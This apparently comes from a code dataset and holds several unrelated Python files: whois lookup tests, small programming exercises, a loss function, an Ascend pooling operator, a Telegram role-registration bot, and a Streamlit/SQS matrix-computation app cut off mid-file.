test_ripe():\n ripe = [\n \"5.34.248.224\", \"94.23.166.108\",\n \"213.95.21.43\", \"188.138.75.207\"\n ]\n organizations = [\n \"Newsnet AG\",\n \"OVH GmbH\",\n None,\n None\n ]\n result = whois(*ripe)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"ripe\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\n@raises(NotImplementedError)\ndef test_rwhois_ntt():\n ntt = [\"204.0.0.2\", \"204.1.1.25\"]\n whois(*ntt)\n\n\n@raises(ValueError)\ndef test_twnic():\n twnic = [\"202.39.128.5\", \"202.39.238.192\"]\n whois(*twnic)\n\n\ndef test_jpnic():\n jpnic = [\"211.120.0.3\", \"211.130.5.1\", \"211.125.255.230\"]\n organizations = [\n \"Yahoo Japan Corporation\",\n \"F Bit Communications Corp.\",\n \"Oita Cable Telecom Co,.Ltd.\"\n ]\n result = whois(*jpnic)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"whois.nic.ad.jp\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\n@raises(ValueError)\ndef test_brnic():\n brnic = [\"200.17.0.5\"]\n whois(*brnic)\n\n\ndef test_krnic():\n krnic = [\"222.122.0.5\", \"222.122.10.30\", \"222.122.130.45\"]\n organizations = [\n \"Korea Telecom\",\n \"Korea Telecom\",\n \"Korea Telecom\"\n ]\n\n result = whois(*krnic)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"whois.nic.or.kr\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\ndef test_ip2org():\n expected_data = [\n [\"173.194.38.0\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.1\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.2\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.3\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.4\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.5\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.6\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.7\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.8\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.9\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.14\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"27.114.150.10\", \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n \"DHIVEHINET\"],\n [\"27.114.150.11\", \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n \"DHIVEHINET\"],\n [\"27.114.150.12\", \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n \"DHIVEHINET\"],\n [\"146.231.129.86\", \"Rhodes University\", \"RHODENT2\"],\n [\"41.248.247.207\", \"\", \"IP_Static_MarocTelecom\"],\n [\"146.231.129.81\", \"Rhodes University\", \"RHODENT2\"],\n [\"197.80.150.123\", \"MWEB CONNECT (PROPRIETARY) LIMITED\",\n \"MWEB-NET-197-80-150-0\"],\n [\"200.89.75.197\", \"Universidad de Chile\", \"\"],\n [\"200.89.75.198\", \"Universidad de Chile\", \"\"],\n [\"190.15.141.64\", \"CEDIA\", \"\"],\n [\"200.1.19.4\", \"Universidad Tecnica Federico Santa Maria\", \"\"],\n [\"5.34.248.224\", \"Newsnet AG\", \"LI-NEWSNETAG-HOSTING\"],\n [\"94.23.166.108\", \"OVH GmbH\", \"DE-OVH\"],\n [\"213.95.21.43\", \"\", \"NORIS-STAFF-HOUSING-NET\"],\n [\"188.138.75.207\", \"\", \"BSB-Service-1\"],\n [\"211.120.0.3\", \"Yahoo Japan Corporation\", \"\"],\n [\"211.130.5.1\", \"F Bit Communications Corp.\", \"FBT-08-00001\"],\n [\"211.125.255.230\", \"Oita Cable Telecom Co,.Ltd.\", \"OCT-NET\"],\n [\"222.122.0.5\", \"Korea Telecom\", \"KORNET\"],\n [\"222.122.10.30\", \"Korea Telecom\", \"KORNET\"],\n [\"222.122.130.45\", \"Korea Telecom\", \"KORNET\"]\n ]\n\n result_file = \"test_ip2org_result.csv\"\n ip2org(\"tests/data/ips\", result_file)\n\n result = list()\n with open(result_file) as fin:\n import csv\n result = list(csv.reader(fin))\n\n assert_list_equal(result, expected_data, \"Unexpected result\")\n","repo_name":"hiroaki-yamamoto/gcm-sec-exam","sub_path":"tests/spec_ip2org.py","file_name":"spec_ip2org.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15460383580","text":"angka = input(\"masukan list angka: \").split()\nangka = [int(i) for i in angka]\ntarget = int(input(\"masukan angka target: \"))\ndef sekali(a, t):\n output = []\n for i in a:\n for j in a:\n if (i + j == t) and (a.index(i) != a.index(j)):\n output.extend([a.index(i),a.index(j)])\n return output\nprint(\"kombinasi angkanya adalah :\",sekali(angka, target))\n\n","repo_name":"Rina14/Interaction-Design","sub_path":"soal2_2.py","file_name":"soal2_2.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"id","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9424015508","text":"#!/usr/bin/env python3\n\n'''\nBattleStar written by Michael Weinstein, 2016\nUniversity of California, Los Angeles, Daniel Cohn laboratory and Collaboratory\nemail: [myfirstname].[mylastname] AT ucla.edu\n'''\n\nglobal pythonInterpreterAbsolutePath\npythonInterpreterAbsolutePath = \"/u/local/apps/python/3.4.3/bin/python3\"\n\nclass CheckArgs(): #class that checks arguments and ultimately returns a validated set of arguments to the main program\n \n def __init__(self):\n import argparse\n import os\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--tempdir\", help = \"Force the program to try using a temporary directory. The directory should not already exist.\")\n parser.add_argument(\"-v\", \"--verbose\", help = \"Run in verbose mode (indicate progress, etc.)\", action = 'store_true')\n parser.add_argument(\"-f\", \"--fileList\", help = \"List of files to operate on, separated by commas\")\n rawArgs = parser.parse_args()\n if not rawArgs.tempdir:\n raise RuntimeError(\"A temporary directory must be passed as an argument. None was found.\")\n if rawArgs.tempdir:\n if not os.path.isdir:\n raise RuntimeError(\"Specified temporary directory was not found. \" + rawArgs.tempdir)\n self.tempdir = rawArgs.tempdir\n else:\n raise RuntimeError(\"A temporary directory argument must be passed, but none was seen.\")\n self.verbose = rawArgs.verbose\n fileList = rawArgs.fileList\n if not fileList:\n raise RuntimeError(\"No file list given, nothing to operate on.\")\n self.fileList = fileList.split(\",\")\n\ndef addDataFromFile(file):\n import os\n import pickle\n if not os.path.isfile(file):\n raise RuntimeError(\"Tried to open data file, but it does not exist. \" + file)\n inputFile = open(file,'rb')\n #if args.verbose:\n #print(\"Loading pickle\")\n data = pickle.load(inputFile)\n inputFile.close()\n #if args.verbose:\n #print(\"Loaded pickle.\")\n for key in list(data.keys()):\n #if args.verbose:\n # print(\"Key: \" + key + \":\" + str(len(data[key])))\n combinedData[key] = data[key]\n\ndef main():\n import datetime\n import os\n import pickle\n import random\n start = datetime.datetime.now()\n global args\n args = CheckArgs()\n global combinedData\n combinedData = {}\n progress = 0\n for file in args.fileList:\n if args.verbose:\n print(\"Added data from \" + str(progress) + \" of \" + str(len(args.fileList)) + \" files. \", end = \"\\r\")\n addDataFromFile(file)\n progress += 1\n if args.verbose:\n print(\"Added data from all \" + str(len(args.fileList)) + \" files. \")\n outputFileName = args.tempdir + os.sep + \"finalParts\" + os.sep + args.fileList[0].split(os.sep)[-1] +\".andFriends.scatter.pkl\"\n outputFile = open(outputFileName, 'wb')\n pickle.dump(combinedData, outputFile)\n outputFile.close()\n if args.verbose:\n runtime = datetime.datetime.now() - start\n print(\"Partial build process complete in \" + str(runtime))\n \nmain()\n ","repo_name":"michael-weinstein/BattleStar","sub_path":"baseStar.py","file_name":"baseStar.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936500336","text":"gifts = input()\ngifts_list = gifts.split(\" \")\nlast_gift_index = len(gifts_list) - 1\n\nwhile True:\n command = input()\n\n if command == \"No Money\":\n break\n\n command_list = command.split(\" \")\n\n if \"OutOfStock\" in command:\n for i in range(len(gifts_list)):\n if gifts_list[i] == command_list[1]:\n gifts_list[i] = \"None\"\n\n elif \"Required\" in command:\n if 0 <= int(command_list[2]) <= last_gift_index:\n replace_index = int(command_list[2])\n gifts_list[replace_index] = command_list[1]\n\n elif \"JustInCase\" in command:\n gifts_list[last_gift_index] = command_list[1]\n\nfor gift_no in range(len(gifts_list)):\n if gifts_list[gift_no] == \"None\":\n continue\n\n print(gifts_list[gift_no], end=\" \")\n","repo_name":"Polishko/SoftUni","sub_path":"Python Fundamentals/Exercises/Exercise_3/qu_7.py","file_name":"qu_7.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9350575887","text":"n = int(input())\na = list(map(int, input().split()))\na0 = a[0]\na = sorted(a[1:])\ncnt = 0\nwhile a0 <= a[-1]:\n cnt += 1\n a0 += 1\n a[-1] -= 1\n a.sort()\nprint(cnt)","repo_name":"vchilikov/Olimp","sub_path":"574A.py","file_name":"574A.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17512129930","text":"import numpy as np\n\n\ndef compute_cross_entropy_loss(expected, result):\n assert(expected.shape[1] == result.shape[1])\n size = expected.shape[1]\n\n loss = (-1. / size) * (\n np.sum(np.multiply(expected, np.log(result)))\n + np.sum(np.multiply((1 - expected), np.log(1 - result)))\n )\n\n return loss\n","repo_name":"Lenferd/deep-learning-course","sub_path":"Lab 1/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643982826","text":"from __future__ import absolute_import\n\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import *\n\n\n# pylint: disable=locally-disabled,unused-argument\n# pylint: disable=too-many-arguments,unnecessary-lambda\n@fusion_manager.register(\"max_pool_ext2\")\ndef max_pool_ext2_compute(input_data, output_data, ksize, strides, padding,\n data_format=\"NC1HWC0\", is_fused_compute=True,\n kernel_name=\"max_pool\"):\n \"\"\"\n Performs max_pool_ext2 on the input.\n\n Parameters\n ----------\n input_data: TVM tensor\n A `Tensor`. Must be one of the following types: `float16`,\n `uint8`, `int8`. 5-D input to pool over.\n output_data: dict\n dict of output_data, include keys(shape and dtype).\n ksize: list or tuple\n A list of `ints` that has length 4.\n The size of the window for each dimension of the input tensor.\n strides: list or tuple\n A list of `ints` that has length 4.\n The stride of the sliding window for each dimension of the input tensor.\n padding: str\n A `string` from: \"SAME\", \"VALID\".The type of padding algorithm to use.\n data_format: str\n A `string` from: \"NC1HWC0\", \"NHWC\", \"NCHW\".\n kernel_name: str\n kernel name, default value is 'max_pool'\n\n Returns:\n -------\n res: TVM tensor\n output tensor. Has the same type as `input_data`.\n \"\"\"\n if data_format in (\"NHWC\",):\n window_h, window_w = ksize[1], ksize[2]\n stride_h, stride_w = strides[1], strides[2]\n else:\n window_h, window_w = ksize[2], ksize[3]\n stride_h, stride_w = strides[2], strides[3]\n\n # l1 fusion params assign\n # 0: L1 depth fusion, 1: L1 width fusion, -1: no L1 fusion\n l1_fusion_type = input_data.op.attrs[\"L1_fusion_type\"].value \\\n if \"L1_fusion_type\" in input_data.op.attrs else -1\n in_l1_flag = input_data.op.attrs[\"addr_type\"].value == 1 \\\n if \"addr_type\" in input_data.op.attrs else False\n in_valid_shape = input_data.op.attrs[\"valid_shape\"] \\\n if \"valid_shape\" in input_data.op.attrs else []\n in_slice_offset = input_data.op.attrs[\"slice_offset\"] \\\n if \"slice_offset\" in input_data.op.attrs else []\n in_select_read_flag = bool(in_valid_shape)\n in_split_index = input_data.op.attrs[\"split_index\"].value \\\n if \"split_index\" in input_data.op.attrs else 0\n out_l1_flag = output_data.get(\"addr_type\") == 1\n fusion_params = {\"is_fused_compute\": is_fused_compute,\n \"l1_fusion_type\": l1_fusion_type,\n \"in_l1_flag\": in_l1_flag,\n \"out_l1_flag\": out_l1_flag,\n \"in_select_read_flag\": in_select_read_flag,\n \"in_split_index\": in_split_index,\n \"in_slice_offset\": in_slice_offset,\n \"in_valid_shape\": in_valid_shape}\n\n if in_select_read_flag:\n select_tensor_in = tvm.compute(in_valid_shape,\n lambda n, c1, h, w, c0:\n input_data(n, c1, h +\n in_slice_offset[2], w, c0),\n name=\"tensor_read_select\",\n attrs=input_data.op.attrs)\n res = te.lang.cce.pooling2d(select_tensor_in, (window_h, window_w),\n (stride_h, stride_w),\n \"MAX\", padding, pad=(0, 0, 0, 0),\n fusion_params=fusion_params)\n elif l1_fusion_type == 1:\n input_data.op.attrs[\"addr_type\"].value = 1\n in_l1_flag = True\n fusion_params[\"in_l1_flag\"] = in_l1_flag\n\n l1_width_fusion_in = tvm.compute(input_data.shape,\n lambda n, c1, h, w, c0:\n input_data(n, c1, h, w, c0),\n name=\"l1_width_fusion_tensor_in\",\n attrs=input_data.op.attrs)\n res = te.lang.cce.pooling2d(l1_width_fusion_in, (window_h, window_w),\n (stride_h, stride_w), \"MAX\", padding,\n pad=(0, 0, 0, 0),\n fusion_params=fusion_params)\n else:\n res = te.lang.cce.pooling2d(input_data, (window_h, window_w),\n (stride_h, stride_w),\n \"MAX\", padding, pad=(0, 0, 0, 0),\n fusion_params=fusion_params)\n\n return res\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_OUTPUT, REQUIRED_ATTR_LIST_INT, REQUIRED_ATTR_LIST_INT,\n REQUIRED_ATTR_STR, OPTION_ATTR_STR, KERNEL_NAME)\ndef max_pool_ext2(input_data, output_data, ksize, strides, padding,\n data_format=\"NC1HWC0\", kernel_name=\"max_pool_ext2\"):\n \"\"\"\n Performs max pooling ext2 on the input.\n\n Parameters\n ----------\n input_data: dict\n dict of input_data, include keys(shape and dtype).\n output_data: dict\n dict of output_data, include keys(shape and dtype).\n ksize: list or tuple\n A list of `ints` that has length 4.\n The size of the window for each dimension of the input tensor.\n strides: list or tuple\n A list of `ints` that has length 4.\n The stride of the sliding window for each dimension of the input tensor.\n padding: str\n A `string` from: `\"SAME\", \"VALID\"`.The type of padding algorithm to use.\n data_format: str\n A `string` from: `\"NC1HWC0\", \"NHWC\", \"NCHW\"`.\n kernel_name: str\n kernel name, default value is 'max_pool'\n\n Returns:\n -------\n None\n \"\"\"\n input_shape = input_data.get(\"shape\")\n input_dtype = input_data.get(\"dtype\").lower()\n\n check_shape(input_shape, param_name=\"input_data\")\n\n check_list = (\"float16\", \"int8\", \"uint8\")\n check_dtype(input_dtype, check_list, param_name=\"input_data\")\n\n if data_format in (\"NHWC\",):\n if len(ksize) != 4:\n raise RuntimeError(\"Invalid ksize params, ksize dim must be 4.\")\n if ksize[0] != 1 or ksize[3] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other ksize dimension\"\n \"should be one\")\n if len(strides) != 4:\n raise RuntimeError(\"Invalid strides params, strides dim must be 4.\")\n if strides[0] != 1 or strides[3] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other strides dimension\"\n \"should be one\")\n elif data_format in (\"NC1HWC0\", \"NCHW\"):\n if len(ksize) != 4:\n raise RuntimeError(\"Invalid ksize params, ksize dim must be 4.\")\n if ksize[0] != 1 or ksize[1] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other ksize dimension\"\n \"should be one\")\n if len(strides) != 4:\n raise RuntimeError(\"Invalid strides params, strides dim must be 4.\")\n if strides[0] != 1 or strides[1] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other strides dimension\"\n \"should be one\")\n else:\n raise RuntimeError(\"The data_format is not supported\")\n\n if padding not in (\"SAME\", \"VALID\"):\n raise RuntimeError(\"MaxPool can only support SAME or VALID\"\n \"padding mode.\")\n\n # set tensor attrs, during L1 fusion these attrs will assign by te_fusion\n addr_type = input_data.get(\"addr_type\", 0)\n valid_shape = input_data.get(\"valid_shape\", [])\n slice_offset = input_data.get(\"slice_offset\", [])\n split_index = input_data.get(\"split_index\", 0)\n l1_fusion_type = input_data.get(\"L1_fusion_type\", -1)\n attr = {\"addr_type\": addr_type,\n \"valid_shape\": valid_shape,\n \"slice_offset\": slice_offset,\n \"split_index\": split_index,\n \"L1_fusion_type\": l1_fusion_type}\n is_l1fusion = l1_fusion_type in (0, 1)\n\n data_input = tvm.placeholder(input_shape, name=\"data_input\",\n dtype=input_dtype, attrs=attr)\n\n res = max_pool_ext2_compute(data_input, output_data, ksize, strides,\n padding, data_format=data_format,\n is_fused_compute=False,\n kernel_name=kernel_name)\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n config = {\n \"name\": kernel_name,\n \"tensor_list\": [data_input, res],\n \"l1_fusion_option\": is_l1fusion}\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/max_pool_ext2.py","file_name":"max_pool_ext2.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15377432112","text":"# -*- coding: utf-8 -*-\nimport telebot\nfrom telebot import types\nimport config\nimport dbworker\n\nbot = telebot.TeleBot(config.TOKEN)\n\n# Начало диалога\n@bot.message_handler(commands=[\"start\"])\ndef cmd_start(message):\n # если /start написал авторизовавшийся пользователь\n if dbworker.get_current_state(message.chat.id) == config.States.AUTHORIZATED.value:\n # подключаемся к БД\n conn = dbworker.SQLighter()\n # Спрашиваем: это админ?\n answer = conn.is_admin(message.from_user.id)\n # закрываем подключение к базе\n conn.close()\n\n # если это одмен\n if answer:\n bot.send_message(message.from_user.id, \"Начнём работу, Администратор\")\n else:\n # не одмен\n bot.send_message(message.from_user.id, \"Начнём работу, Менаджер\")\n else:\n # /start написал НЕ авторизовавшийся пользователь\n bot.send_message(message.chat.id, \"Напиши кто ты по масти\")\n dbworker.set_state(message.chat.id, config.States.START_ENTER.value)\n\n# По команде /reset будем сбрасывать состояния, возвращаясь к началу диалога\n@bot.message_handler(commands=[\"reset\"])\ndef cmd_reset(message):\n bot.send_message(message.chat.id, \"Начнём с начала\")\n dbworker.set_state(message.chat.id, config.States.START_ENTER.value)\n\n# Обрабатывается в первом состоянии - когда нужно ввести admin или manager\n# Состояние - старт\n# обрабатывает любы сообщения можно настроить \n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.START_ENTER.value)\ndef user_entering_name(message):\n if message.text == 'admin':\n bot.send_message(message.chat.id, \"Приветствую повелитель, но введи сначала пароль\")\n dbworker.set_state(message.chat.id, config.States.ENTER_PASSWOD.value)\n elif message.text == 'manager':\n bot.send_message(message.chat.id, \"Дарова роботяга! Введи имя организации\")\n dbworker.set_state(message.chat.id, config.States.ENTER_COMPANY.value)\n else:\n bot.send_message(message.chat.id, \"Введи 'admin' или 'manager'\")\n\n# Обрабатывается когда нужно ввести пароль\n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.ENTER_PASSWOD.value)\ndef user_entering_password(message):\n if message.text == '12345678':\n # поключаемся к базе данных\n conn = dbworker.SQLighter()\n # Получаем ответ от БД\n answer = conn.add_admin(message.from_user)\n # закрываем соединение\n conn.close()\n\n if not answer:\n # пользователь уже есть в таблице админов\n bot.send_message(message.chat.id, \"Добро пожаловать снова\")\n else:\n # Новый админ\n bot.send_message(message.chat.id, \"Я записал тебя в список админов\")\n dbworker.set_state(message.chat.id, config.States.AUTHORIZATED.value)\n else:\n bot.send_message(message.chat.id, \"Неправильный пароль, попробуй снова\")\n\n# Обрабатывается когда нужно ввести имя компании\n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.ENTER_COMPANY.value)\ndef user_work(message):\n # подключаемся к базе\n conn = dbworker.SQLighter()\n if not conn.add_manager(message.from_user, message.text):\n # пользователь уже есть в таблице админов\n # обновим его поля\n conn.update_manager(message.from_user, company=message.text)\n # Закрываем соединение\n conn.close()\n bot.send_message(message.chat.id, \"Имя компании успешно изменено\")\n else:\n # Новый менаджер\n bot.send_message(message.chat.id, \"Добро пожаловать на каторгу\")\n\n dbworker.set_state(message.chat.id, config.States.AUTHORIZATED.value)\n\n# Обрабатывается когда пользователь уже зарегестрирован\n# Пишем разные сообщения в зависимосты кто это\n# Тут обрабатываются пока текстовые сообщения, но это можно настроить\n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.AUTHORIZATED.value)\ndef user_working(message):\n # подключаемся к базе\n conn = dbworker.SQLighter()\n # Спрашиваем: \"Это Одмен?\"\n answer = conn.is_admin(message.from_user.id)\n # Закрываем соединение с базой\n conn.close()\n\n # Если Админ можно зафигачить кастомную клавиатуру или тп\n if answer:\n bot.send_message(message.from_user.id, 'Адмен привет. Такое дело не пиши мне')\n else:\n # Не одмен\n bot.send_message(message.from_user.id, 'Манагер дарова. Иди работать, не пиши мне')\n\n\nif __name__ == \"__main__\":\n # bot.send_message(config.ADMIN_ID, 'Бот запущен')\n bot.infinity_polling()","repo_name":"VasiliySilver/DATA_BASE_bOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10799043986","text":"import boto3\nimport streamlit as st\nimport numpy as np\nfrom math import *\nimport ast\nimport time\nimport multiprocessing as mp\nfrom multiprocessing import shared_memory, Manager\nfrom botocore.config import Config\nfrom ctypes import c_char_p\n\n\ndef initSQS(QeueName):\n config = Config(\n region_name='us-east-1',\n signature_version='v4',\n retries={\n 'max_attempts': 10,\n 'mode': 'standard'\n }\n )\n\n # Get the service resource\n sqs = boto3.resource('sqs', config=config)\n\n # Get the queue\n queue = sqs.get_queue_by_name(QueueName=QeueName)\n\n return queue\n\n\ndef sendJob(message):\n # Create a new message\n response = queue_send.send_message(MessageBody=message)\n\n\ndef encodeMessageMaster(index, shape, m1, m2, isMultiplication):\n type = '0'\n\n if isMultiplication:\n type = '1'\n\n index_str = str(index)\n shape_str = str(shape)\n m1_str = str(m1.tolist())\n m2_str = str(m2.tolist())\n # m1_str = np.array_str(m1)\n # m2_str = np.array_str(m2)\n\n result = [type, index_str, shape_str, m1_str, m2_str]\n return '/'.join(result)\n\n\ndef decodeMessageMaster(message):\n messageRecv = message.split('/')\n\n index = ast.literal_eval(messageRecv[0])\n shape = ast.literal_eval(messageRecv[1])\n m_list = ast.literal_eval(messageRecv[2])\n m = np.array(m_list, dtype=int)\n\n return index, m\n\n\ndef generateMatrix(x, y):\n m1 = np.random.randint(0, 100, (x, y))\n return m1\n\n\ndef devideMatrix(M, subMatrixSize):\n l_sub_matrix = ceil(sqrt(subMatrixSize))\n\n # Define the necessary padding\n paddingX = (ceil(M.shape[1] / l_sub_matrix) * l_sub_matrix) - M.shape[1]\n paddingY = (ceil(M.shape[0] / l_sub_matrix) * l_sub_matrix) - M.shape[0]\n\n # Add a padding\n M = np.pad(M, ((0, paddingY), (0, paddingX)))\n\n # Devision of the matrix\n M = np.lib.stride_tricks.as_strided(M, shape=(\n int(M.shape[0] / l_sub_matrix), int(M.shape[1] / l_sub_matrix), l_sub_matrix, l_sub_matrix),\n strides=(M.shape[1] * l_sub_matrix, l_sub_matrix, M.shape[1], 1))\n\n return paddingX, paddingY, M\n\n\ndef processMessage(message_body, final_matrix, isMultiplication):\n index, m = decodeMessageMaster(message_body)\n\n if isMultiplication:\n final_matrix[index[0]][index[1]] += m\n else:\n final_matrix[index[0]][index[1]] = m\n\n\ndef getTotalToReceive(m1, m2, isMultiplication):\n if isMultiplication:\n total_to_receive = m1.shape[0] * m2.shape[0] * m1.shape[1]\n else:\n total_to_receive = m1.shape[0] * m1.shape[1]\n\n return total_to_receive\n\n\ndef sendMatrix(M1, M2, total, isMultiplication, string_placeholder):\n\n count = 0\n\n if isMultiplication:\n index1 = [0, 0]\n index2 = [0, 0]\n\n for y2 in M2:\n for x1 in M1:\n index1[1] = 0\n index2[0] = 0\n for x, y in zip(x1, y2):\n sendJob(encodeMessageMaster([index1[0], index2[1]], np.shape(x), x, y.T, isMultiplication))\n count += 1\n string_placeholder.value = (f\"Total send: {count}/{total}\")\n index1[1] += 1\n index2[0] += 1\n index1[0] += 1\n index1[0] = 0\n index2[1] += 1\n\n else:\n index = [0, 0]\n\n for X1, X2 in zip(M1, M2):\n index[1] = 0\n for x1, x2 in zip(X1, X2):\n sendJob(encodeMessageMaster(index, np.shape(x1), x1, x2, isMultiplication))\n index[1] += 1\n index[0] += 1\n\ndef receiveMatrix(total_to_receive, final_matrix, isMultiplication, string_placeholder):\n number_receive = 0\n\n while number_receive < total_to_receive:\n messages = queue_receive.receive_messages()\n string_placeholder.value = (f\"Total received: {number_receive}/{total_to_receive}\")\n for message in messages:\n number_receive += 1\n processMessage(message.body, final_matrix, isMultiplication)\n message.delete()\n\n\n###################################################################################\n\nqueue_receive = initSQS('matrixQueueWtoM')\nqueue_send = initSQS('matrixQueueMtoW')\n\n# ############################ Interface ############################################\nst.title(\"Matrices Computation App\")\nst.subheader(\"Select the computation\")\n\ntype = st.radio(\n \"Computation: \",\n ('Addition', 'Multiplication'))\n\nst.subheader(\"Select the size of the matrices\")\n\nisMultiplication = False\n\nif type == 'Addition':\n isMultiplication = False\n number_row_m1 = st.number_input('Number of rows and column matrices', min_value=0)\n number_row_m2 = number_row_m1\n number_column_m1 = number_row_m1\n number_column_m2 = number_row_m1\nelse:\n isMultiplication = True\n col11, col12 = st.columns(2)\n with col11:\n number_row_m1 = st.number_input('Number of rows in the first matrix', min_value=0)\n number_column_m1 = st.number_input('Number of column in the first matrix', min_value=0)\n with col12:\n number_row_m2 = st.number_input('Number of rows in the second matrix', min_value=0)\n number_column_m2 = st.number_input('Number of column in the second matrix', min_value=0)\n\nst.subheader(\"Select the of element per submatrices\")\nsubmatrix_element_number = st.number_input('Number of element', min_value=0, max_value=30000)\n\n########################################################################################\ndef runComputation():\n\n if isMultiplication == False:\n M1 = np.random.randint(100, size=(number_row_m1, number_column_m1))\n M2 = np.random.randint(100, size=(number_row_m2, number_column_m2))\n\n if isMultiplication:\n if number_column_m1 != number_row_m2:\n st.error(\n 'The number of column for the first matrix need to be identical to the number of row of the second matrix.',\n icon=\"🚨\")\n else:\n M1 = np.random.randint(100, size=(number_row_m1, number_column_m1))\n M2 = np.random.randint(100, size=(number_row_m2, number_column_m2))\n\n col21, col22 = st.columns(2)\n with col21:\n st.subheader(\"Matrix 1:\")\n st.text(str(M1))\n with col22:\n st.subheader(\"Matrix 2:\")\n st.text(str(M2))\n\n col31, col32 = st.columns(2)\n with col31:\n st.subheader(\"Serial processing result:\")\n\n with st.spinner('Wait for processing...'):\n time_1 = time.time()\n\n if isMultiplication:\n st.text(str(np.dot(M1, M2)))\n else:\n st.text(str(M1 + M2))\n\n st.text(\"Execution time : \")\n st.text(str((time.time() - time_1)))\n st.success('Done!')\n\n with col32:\n st.subheader(\"Parallel processing result:\")\n\n time_2 = time.time()\n\n if isMultiplication:\n # Transpose of M2\n M2 = np.transpose(M2)\n # Necessary to replace the byte in good order\n M2 = M2.tolist()\n M2 = np.array(M2)\n\n M1 = M1.astype('int8')\n M2 = M2.astype('int8')\n\n padding11, padding12, M1 = devideMatrix(M1, submatrix_element_number)\n padding21, padding22, M2 = devideMatrix(M2, submatrix_element_number)\n\n total_to_receive = getTotalToReceive(M1, M2, isMultiplication)\n\n manager = Manager()\n string_placeholder1 = manager.Value(c_char_p, \"\")\n\n with st.spinner('Send paquet'):\n placeholder1 = st.empty()\n process1 = mp.Process(target=sendMatrix, args=(M1, M2, total_to_receive, isMultiplication, string_placeholder1))\n process1.start()\n st.success('Done!')\n\n final_matrix = np.zeros([M1.shape[0], M2.shape[0], M1.shape[2], M1.shape[2]], dtype=int)\n\n shm = shared_memory.SharedMemory(create=True, size=final_matrix.nbytes)\n # Now create a NumPy array backed by shared memory\n final_matrix_buffer = np.ndarray(final_matrix.shape, dtype=final_matrix.dtype, buffer=shm.buf)\n final_matrix_buffer[:] = final_matrix[:] # Copy the original data into shared memory\n\n string_placeholder2 = manager.Value(c_char_p, \"\")\n\n with st.spinner('Receive paquet'):\n placeholder2 = st.empty()\n process2 = mp.Process(target=receiveMatrix, args=(total_to_receive, final_matrix_buffer, isMultiplication, string_placeholder2))\n process2.start()\n st.success('Done!')\n\n while process1.is_alive() or process2.is_alive():\n placeholder1.text(string_placeholder1.value)\n placeholder2.text(string_placeholder2.value)\n\n process1.join()\n process2.join()\n\n final_matrix[:] = final_matrix_buffer[:]\n\n # Clean up from within the first Python shell\n del final_matrix_buffer # Unnecessary; merely emphasizing the array is no longer used\n shm.close()\n shm.unlink() # Free and release the shared memory block at the very end\n\n final_matrix = np.concatenate(final_matrix, axis=1)\n 